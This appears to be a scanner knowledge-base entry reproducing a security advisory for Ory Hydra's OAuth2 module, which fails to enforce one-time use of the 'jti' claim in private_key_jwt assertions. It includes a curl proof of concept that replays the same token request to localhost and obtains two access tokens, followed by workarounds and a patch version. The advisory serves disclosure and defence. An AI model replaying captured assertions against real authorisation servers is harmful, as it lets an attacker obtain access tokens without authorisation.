QID 982387

QID 982387: Go (go) Security Update for github.com/ory/hydra/oauth2 (GHSA-3p3g-vpw6-4w66)

Security update has been released for github.com/ory/hydra/oauth2,github.com/ory/hydra to fix the vulnerability.

Note: The preceding description block is extracted directly from the security advisory. Using automation, we have attempted to clean and format it as much as possible without introducing additional issues.

"When using client authentication method "private_key_jwt" [1], OpenId specification says the following about assertion `jti`:"

> A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties

"Hydra does not seem to check the uniqueness of this `jti` value. Here is me sending the same token request twice, hence with the same `jti` assertion, and getting two access tokens:"

```
$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'grant_type=client_credentials' \
--data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \
--data-urlencode 'scope=application openid' \
--data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \
--data-urlencode 'client_assertion=eyJhb [...] jTw'
{"access_token":"zeG0NoqOtlACl8q5J6A-TIsNegQRRUzqLZaYrQtoBZQ.VR6iUcJQYp3u_j7pwvL7YtPqGhtyQe5OhnBE2KCp5pM","expires_in":3599,"scope":"application openid","token_type":"bearer"} ~$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'grant_type=client_credentials' \
--data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \
--data-urlencode 'scope=application openid' \
--data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \
--data-urlencode 'client_assertion=eyJhb [...] jTw'
{"access_token":"wOYtgCLxLXlELORrwZlmeiqqMQ4kRzV-STU2_Sollas.mwlQGCZWXN7G2IoegUe1P0Vw5iGoKrkOzOaplhMSjm4","expires_in":3599,"scope":"application openid","token_type":"bearer"}
```

  • CVSS V3 rated as Medium - 5.3 severity.
  • CVSS V2 rated as Medium - 3.5 severity.
  • Solution
    This will be patched with v1.4.0+oryOS.17Workaround:
    Two workarounds have been identified:

    - Do not allow clients to use `private_key_jwt`
    - Use short expiry times for the JWTs
    Vendor References

    CVEs related to QID 982387

    Software Advisories
    Advisory ID Software Component Link
    GHSA-3p3g-vpw6-4w66 github.com/ory/hydra URL Logo github.com/advisories/GHSA-3p3g-vpw6-4w66
    GHSA-3p3g-vpw6-4w66 github.com/ory/hydra/oauth2 URL Logo github.com/advisories/GHSA-3p3g-vpw6-4w66